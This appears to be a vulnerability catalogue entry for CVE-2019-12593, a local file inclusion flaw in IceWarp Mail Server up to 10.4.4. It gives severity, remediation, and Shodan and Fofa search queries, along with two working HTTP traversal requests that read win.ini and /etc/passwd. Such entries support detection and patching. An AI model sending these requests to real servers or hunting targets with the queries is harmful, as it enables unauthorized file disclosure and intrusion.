| Title | IceWarp Mail Server <=10.4.4 - Local File Inclusion |
|---|---|
| Author | pikpikcu |
| Severity | High |
| Impact | An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. |
| Remediation | Upgrade IceWarp Mail Server to a version higher than 10.4.4 or apply the vendor-provided patch to fix the LFI vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.75083 |
| CVE ID | CVE-2019-12593 |
| CWE ID | CWE-22 |
| Shodan Query | title:"icewarp"http.title:"icewarp server administration"http.title:"icewarp"cpe:"cpe:2.3:a:icewarp:mail_server" |
| Fofa Query | title="icewarp server administration"title="icewarp" |
| Tags | cve cve2019 packetstorm lfi icewarp vkev vuln |
IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:28.0) Gecko/20100101 Firefox/28.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-12593.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-12593.pcap
N/AN/A